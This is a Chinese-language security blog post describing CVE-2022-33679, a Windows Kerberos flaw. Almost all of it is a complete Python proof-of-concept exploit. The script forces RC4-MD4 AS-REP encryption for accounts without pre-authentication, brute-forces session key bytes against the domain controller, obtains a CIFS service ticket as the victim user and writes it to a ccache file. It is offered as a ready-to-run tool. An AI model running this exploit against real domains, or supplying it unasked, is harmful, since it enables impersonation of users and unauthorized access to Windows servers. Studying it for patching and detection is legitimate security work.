【CVE-2022-33679】Microsoft Windows Kerberos 安全漏洞POC

作者:Sec-Labs | 发布时间:

漏洞介绍

Microsoft Windows Kerberos是美国微软(Microsoft)公司的一个用于在网络集群中进行身份验证的软件。Kerberos 同时作为一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。

Microsoft Windows Kerberos存在权限提升漏洞(CVE-2022-33679)。对于设置了“不要求Kerberos预身份验证”的账户,攻击者可请求KDC使用弱加密类型RC4-MD4加密AS-REP,进而逐字节恢复会话密钥,并以该用户身份申请服务票据。以下产品和版本受到影响:Windows Server 2019,Windows Server 2019 (Server Core installation),Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022 Azure Edition Core Hotpatch,Windows Server 2016,Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2,Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Systems Service Pack 2,Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation),Windows Server 2008 R2 for x64-based Systems Service Pack 1,Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation),Windows Server 2012,Windows Server 2012 (Server Core installation),Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation)。

项目地址

https://github.com/Bdenneu/CVE-2022-33679

POC

CVE-2022-33679.py

import datetime
import random
import argparse
import logging
import sys
from binascii import hexlify, unhexlify

from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue

from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials

from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, \
    PA_ENC_TS_ENC, AS_REP, EncryptedData, EncASRepPart, seq_set, \
    seq_set_iter, KERB_ERROR_DATA, HostAddress, HostAddresses, Ticket
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REQ, TGS_REP, EncTGSRepPart
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.types import Ticket as TTicket
from impacket.krb5 import constants
from impacket.krb5.crypto import Key
from impacket.krb5.ccache import Principal as CPrincipal
from impacket.krb5.ccache import CCache, Header, Credential, Times, CountedOctetString
try:
    from impacket.krb5.ccache import KeyBlockV4 as KeyBlock
except:
    from impacket.krb5.ccache import KeyBlock

from arc4 import ARC4

# Use the OS-backed generator when the platform provides one; otherwise
# fall back to the module-level default generator so nonces can still be drawn.
try:
    rand = random.SystemRandom()
except NotImplementedError:
    rand = random

class TGTBrute:
    """Recover an AS-REP session key byte by byte and trade the TGT for a CIFS ticket.

    The workflow implemented by :meth:`run` is:

    1. request a TGT without pre-authentication using encryption type -128,
    2. derive the start of the RC4 key stream from a known AS-REP plaintext
       prefix and extend it by five bytes, using the KDC's accept/reject
       answer to forged encrypted timestamps as an oracle,
    3. rebuild the session key, request a ``cifs/<servername>`` ticket and
       save it as a ccache file.

    Args:
        target: user name the TGT is requested for.
        domain: Kerberos realm / domain of that user.
        servername: host part of the ``cifs/`` service principal to request.
        options: parsed command-line options; only ``dc_ip`` is read.
    """

    # Encryption type number requested for every exchange in this class.
    _ETYPE_RC4_MD4 = -128
    # Length of the zero-filled prefix that precedes the ASN.1 payload in every
    # plaintext this class builds or parses.
    # NOTE(review): presumably the checksum/confounder header of this etype - confirm.
    _HEADER_LEN = 24
    # Number of key-stream bytes recovered through the pre-authentication oracle.
    _RECOVERED_KEY_BYTES = 5

    def __init__(self, target, domain, servername, options):
        self.__user = target
        self.__domain = domain
        self.__servername = servername
        self.__options = options
        self.__kdcHost = options.dc_ip
        self.__asReq = None
        self.__reqBody = None
        self.__encodedPacRequest = None

    @staticmethod
    def _xor(left, right):
        """Return the byte-wise XOR of two byte strings (truncated to the shorter one)."""
        return bytes(a ^ b for a, b in zip(left, right))

    def prepareAsReq(self, requestPAC=True):
        """Build a fresh AS-REQ skeleton and store it on the instance.

        Sets ``self.__asReq``, ``self.__reqBody`` and the encoded PAC request.
        No ``padata`` is attached here; callers add it afterwards.

        Args:
            requestPAC: value stored in the ``include-pac`` field.

        Raises:
            Exception: if the configured domain is the empty string.
        """
        domain = self.__domain.upper()
        # Fail fast, before any request state is replaced.
        if domain == '':
            raise Exception('Empty Domain not allowed in Kerberos')

        self.__asReq = AS_REQ()

        serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

        pacRequest = KERB_PA_PAC_REQUEST()
        pacRequest['include-pac'] = requestPAC
        self.__encodedPacRequest = encoder.encode(pacRequest)

        self.__asReq['pvno'] = 5
        self.__asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
        self.__reqBody = seq_set(self.__asReq, 'req-body')

        opts = [
            constants.KDCOptions.forwardable.value,
            constants.KDCOptions.renewable.value,
            constants.KDCOptions.proxiable.value,
        ]
        self.__reqBody['kdc-options'] = constants.encodeFlags(opts)

        seq_set(self.__reqBody, 'sname', serverName.components_to_asn1)
        seq_set(self.__reqBody, 'cname', userName.components_to_asn1)

        # Ticket lifetime and renewal deadline: one day from now (UTC).
        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
        self.__reqBody['realm'] = domain
        self.__reqBody['till'] = KerberosTime.to_asn1(now)
        self.__reqBody['rtime'] = KerberosTime.to_asn1(now)
        self.__reqBody['nonce'] = rand.getrandbits(31)
        # Offer only the single encryption type this class works with.
        seq_set_iter(self.__reqBody, 'etype', (self._ETYPE_RC4_MD4,))

    def getTGT(self, requestPAC=True):
        """Send an AS-REQ without pre-authentication and return the raw reply.

        Args:
            requestPAC: forwarded to :meth:`prepareAsReq`.

        Returns:
            The bytes returned by ``sendReceive`` (decoded as AS-REP by the caller).

        Raises:
            SystemExit: with status 1 if the KDC answers KDC_ERR_ETYPE_NOSUPP.
            KerberosError: for any other Kerberos error.
        """
        self.prepareAsReq(requestPAC)
        self.__asReq['padata'] = noValue
        self.__asReq['padata'][0] = noValue
        self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        self.__asReq['padata'][0]['padata-value'] = self.__encodedPacRequest
        for i in range(20):  # Add padding for more known bytes
            addr = HostAddress()
            addr['addr-type'] = 1
            addr['address'] = bytes([0, 0, 0, i])
            self.__reqBody['addresses'][i] = addr
        message = encoder.encode(self.__asReq)

        try:
            # Use the instance's domain rather than a module-level global so the
            # class also works when imported from another module.
            return sendReceive(message, self.__domain, self.__kdcHost)
        except KerberosError as e:
            if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                logging.error(" RC4 is not supported")
                sys.exit(1)
            raise

    def sendEncTs(self, data, requestPAC=True):
        """Send an AS-REQ carrying ``data`` as the encrypted timestamp.

        Args:
            data: cipher bytes placed in the PA-ENC-TIMESTAMP pre-auth entry.
            requestPAC: forwarded to :meth:`prepareAsReq`.

        Returns:
            True if ``sendReceive`` returned without raising, False otherwise.
        """
        self.prepareAsReq(requestPAC)

        encryptedData = EncryptedData()
        encryptedData['etype'] = self._ETYPE_RC4_MD4
        encryptedData['cipher'] = data
        encodedEncryptedData = encoder.encode(encryptedData)

        self.__asReq['padata'] = noValue
        self.__asReq['padata'][0] = noValue
        self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
        self.__asReq['padata'][0]['padata-value'] = encodedEncryptedData
        self.__asReq['padata'][1] = noValue
        self.__asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        self.__asReq['padata'][1]['padata-value'] = self.__encodedPacRequest
        message = encoder.encode(self.__asReq)

        try:
            sendReceive(message, self.__domain, self.__kdcHost)
        except KerberosError:
            # Expected outcome for a wrong guess.
            return False
        except Exception as e:
            # Still reported as a failed guess (unchanged behaviour), but leave a
            # trace so connectivity problems are not mistaken for wrong guesses.
            logging.debug("Unexpected error while probing the KDC: %s", e)
            return False
        return True

    def _bruteForceNextByte(self, encryptedPrefix, index):
        """Find the trailing byte that makes the KDC accept ``encryptedPrefix``.

        Tries all 256 values appended to ``encryptedPrefix`` via :meth:`sendEncTs`
        and returns the first accepted one. Terminates the process with status 1
        if none is accepted.
        """
        for candidate in range(256):
            if self.sendEncTs(encryptedPrefix + bytes([candidate])):
                logging.info("Byte %d: %02x" % (index, candidate))
                return candidate
        logging.error("No matching byte")
        sys.exit(1)

    def RecoverKey(self, encryptedAsREP):
        """Recover the session key from the encrypted part of an AS-REP.

        The first 45 key-stream bytes come from XORing the ciphertext with a
        fixed, assumed plaintext prefix. Five further key-stream bytes are found
        one at a time with :meth:`_bruteForceNextByte`; each round shifts the
        forged timestamp one byte to the right by switching to a longer length
        encoding.

        Args:
            encryptedAsREP: cipher bytes of the AS-REP ``enc-part``.

        Returns:
            A 16-byte key: five recovered bytes followed by eleven ``0xab`` bytes.

        Raises:
            ValueError: if ``encryptedAsREP`` is too short to hold the key bytes.
        """
        header = b'\x00' * self._HEADER_LEN
        AsREPPlain = header + b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'
        knownLen = len(AsREPPlain)
        keyEnd = knownLen + self._RECOVERED_KEY_BYTES
        if len(encryptedAsREP) < keyEnd:
            raise ValueError('Encrypted AS-REP is too short: need at least %d bytes, got %d'
                             % (keyEnd, len(encryptedAsREP)))

        RC4Flow = self._xor(AsREPPlain, encryptedAsREP)

        now = datetime.datetime.utcnow()
        Timestamp = KerberosTime.to_asn1(now).encode()
        # Declared one byte longer than the real timestamp, so the byte being
        # guessed is counted as part of it.
        sTimestamp = len(Timestamp) + 1
        timestampTail = bytes([sTimestamp + 4, 0xa0, sTimestamp + 2, 0x18, sTimestamp]) + Timestamp

        # First byte: outer length in short form.
        encodedTimeStamp = header + bytes([0x30]) + timestampTail
        encryptedTimeStamp = self._xor(RC4Flow, encodedTimeStamp)
        RC4Flow += bytes([self._bruteForceNextByte(encryptedTimeStamp, 0)])

        # Remaining bytes: long-form length (0x81 + j) padded with j zero bytes,
        # which moves the guessed position one byte further each round.
        for j in range(4):
            encodedTimeStamp = header + bytes([0x30, 0x81 + j]) + bytes([0]) * j + timestampTail
            encryptedTimeStamp = self._xor(RC4Flow, encodedTimeStamp)
            RC4Flow += bytes([self._bruteForceNextByte(encryptedTimeStamp, j + 1)])

        recovered = self._xor(RC4Flow[knownLen:keyEnd], encryptedAsREP[knownLen:keyEnd])
        return recovered + b'\xab' * 11

    def TGTtoTGS(self, TGT, sessionKey):
        """Request a ``cifs/<servername>`` service ticket using the TGT.

        Args:
            TGT: decoded AS-REP holding the ticket and client identity.
            sessionKey: key returned by :meth:`RecoverKey`; its first 8 bytes
                key the RC4 cipher that encrypts the authenticator.

        Returns:
            The raw bytes returned by ``sendReceive`` (decoded as TGS-REP by the caller).
        """
        serverName = Principal('cifs/%s' % self.__servername, type=constants.PrincipalNameType.NT_SRV_INST.value)
        ticket = TTicket()
        ticket.from_asn1(TGT['ticket'])

        apReq = AP_REQ()
        apReq['pvno'] = 5
        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
        apReq['ap-options'] = constants.encodeFlags([])
        seq_set(apReq, 'ticket', ticket.to_asn1)

        authenticator = Authenticator()
        authenticator['authenticator-vno'] = 5
        authenticator['crealm'] = TGT['crealm'].asOctets()

        clientName = Principal()
        clientName.from_asn1(TGT, 'crealm', 'cname')
        seq_set(authenticator, 'cname', clientName.components_to_asn1)

        now = datetime.datetime.utcnow()
        authenticator['cusec'] = now.microsecond
        authenticator['ctime'] = KerberosTime.to_asn1(now)
        encodedAuthenticator = encoder.encode(authenticator)

        cipher = ARC4(sessionKey[:8])
        encryptedEncodedAuthenticator = cipher.encrypt(b'\x00' * self._HEADER_LEN + encodedAuthenticator)

        apReq['authenticator'] = noValue
        apReq['authenticator']['etype'] = self._ETYPE_RC4_MD4
        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
        encodedApReq = encoder.encode(apReq)

        tgsReq = TGS_REQ()
        tgsReq['pvno'] = 5
        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
        tgsReq['padata'] = noValue
        tgsReq['padata'][0] = noValue
        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
        tgsReq['padata'][0]['padata-value'] = encodedApReq

        reqBody = seq_set(tgsReq, 'req-body')
        opts = [
            constants.KDCOptions.forwardable.value,
            constants.KDCOptions.renewable.value,
            constants.KDCOptions.renewable_ok.value,
            constants.KDCOptions.canonicalize.value,
        ]
        reqBody['kdc-options'] = constants.encodeFlags(opts)
        seq_set(reqBody, 'sname', serverName.components_to_asn1)
        # Instance attribute instead of a module-level global (see getTGT).
        reqBody['realm'] = self.__domain

        till = datetime.datetime.utcnow() + datetime.timedelta(days=1)
        reqBody['till'] = KerberosTime.to_asn1(till)
        reqBody['nonce'] = rand.getrandbits(31)
        seq_set_iter(reqBody, 'etype',
                     (
                         int(constants.EncryptionTypes.rc4_hmac.value),
                         int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
                         int(constants.EncryptionTypes.des_cbc_md5.value),
                     ))

        message = encoder.encode(tgsReq)
        return sendReceive(message, self.__domain, self.__kdcHost)

    def TGSToCCache(self, TGS, sessionKey):  # from CCache.fromTGT
        """Convert a decoded TGS-REP into a ``CCache`` holding one credential.

        Args:
            TGS: decoded TGS-REP.
            sessionKey: key returned by :meth:`RecoverKey`; its first 8 bytes
                key the RC4 cipher that decrypts the reply's ``enc-part``.

        Returns:
            A ``CCache`` with the client principal and the service credential.
        """
        ccache = CCache()
        ccache.headers = []
        header = Header()
        header['tag'] = 1
        header['taglen'] = 8
        header['tagdata'] = b'\xff\xff\xff\xff\x00\x00\x00\x00'
        ccache.headers.append(header)

        tmpPrincipal = Principal()
        tmpPrincipal.from_asn1(TGS, 'crealm', 'cname')
        ccache.principal = CPrincipal()
        ccache.principal.fromPrincipal(tmpPrincipal)

        # Now let's add the credential
        encryptedTGSREP = bytes(TGS['enc-part']['cipher'])
        cipher = ARC4(sessionKey[:8])
        # Drop the fixed-size prefix before ASN.1 decoding.
        plainText = cipher.decrypt(encryptedTGSREP)[self._HEADER_LEN:]
        encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]

        credential = Credential()
        server = Principal()
        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
        tmpServer = CPrincipal()
        tmpServer.fromPrincipal(server)
        credential['client'] = ccache.principal
        credential['server'] = tmpServer
        credential['is_skey'] = 0

        credential['key'] = KeyBlock()
        credential['key']['keytype'] = int(encTGSRepPart['key']['keytype'])
        credential['key']['keyvalue'] = encTGSRepPart['key']['keyvalue'].asOctets()
        credential['key']['keylen'] = len(credential['key']['keyvalue'])

        credential['time'] = Times()
        credential['time']['authtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['authtime']))
        credential['time']['starttime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['starttime']))
        credential['time']['endtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['endtime']))
        # after kb4586793 for cve-2020-17049 this timestamp may be omitted
        if encTGSRepPart['renew-till'].hasValue():
            credential['time']['renew_till'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['renew-till']))

        credential['tktflags'] = ccache.reverseFlags(encTGSRepPart['flags'])
        credential['num_address'] = 0

        credential.ticket = CountedOctetString()
        credential.ticket['data'] = encoder.encode(TGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
        credential.ticket['length'] = len(credential.ticket['data'])
        credential.secondTicket = CountedOctetString()
        credential.secondTicket['data'] = b''
        credential.secondTicket['length'] = 0
        ccache.credentials.append(credential)
        return ccache

    def run(self):
        """Run the full workflow and write ``<user>_<servername>.ccache``."""
        logging.info("Getting TGT - Retrieving AS-REP")
        tgt = self.getTGT()
        decodedtgt = decoder.decode(tgt, asn1Spec=AS_REP())[0]
        encryptedAsREP = bytes(decodedtgt['enc-part']['cipher'])

        logging.info("Trying to recover the RC4 Flow")
        sessionKey = self.RecoverKey(encryptedAsREP)
        logging.info("Recovered Session key: %s" % sessionKey.hex())

        TGS = self.TGTtoTGS(decodedtgt, sessionKey)
        logging.info("Got TGS for %s" % self.__servername)
        decodedtgs = decoder.decode(TGS, asn1Spec=TGS_REP())[0]
        ccache = self.TGSToCCache(decodedtgs, sessionKey)

        ccacheFile = self.__user + '_' + self.__servername + '.ccache'
        logging.info("Saving ticket in %s" % ccacheFile)
        ccache.saveFile(ccacheFile)

# Process command-line arguments, configure logging and run the attack.
if __name__ == '__main__':
    print(version.BANNER)

    # The trailing space after "having" keeps the two adjacent string literals
    # from running together in the rendered help text.
    parser = argparse.ArgumentParser(add_help=True, description="Retrieve a TGT for a user having "
                                     "'Do not require Kerberos preauthentication' set and export their TGS of the given server")

    parser.add_argument('target', action='store', help='domain/username')
    parser.add_argument('serverName', action='store', help='server name')
    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
                                                                            'omitted it uses the domain part (FQDN) '
                                                                            'specified in the target parameter')

    options = parser.parse_args()
    # Init the example's logger theme
    logger.init(options.ts)

    if options.debug:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    # `domain` is deliberately kept as a module-level name: other code in this
    # file may read it. The password part of the target is not used.
    domain, username, password = parse_credentials(options.target)
    if domain == '':
        logging.critical('Domain should be specified!')
        sys.exit(1)

    try:
        executer = TGTBrute(username, domain, options.serverName, options)
        executer.run()
    except Exception as e:
        logging.debug("Exception:", exc_info=True)
        logging.error(str(e))
        # Report the failure to the calling shell instead of exiting with 0.
        sys.exit(1)

截图

8951dba439215834

 

标签:工具分享, 漏洞分享, POC脚本